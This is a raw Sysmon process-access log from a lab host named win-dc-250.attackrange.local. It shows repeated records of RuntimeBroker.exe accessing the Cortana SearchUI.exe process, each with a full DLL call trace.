13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 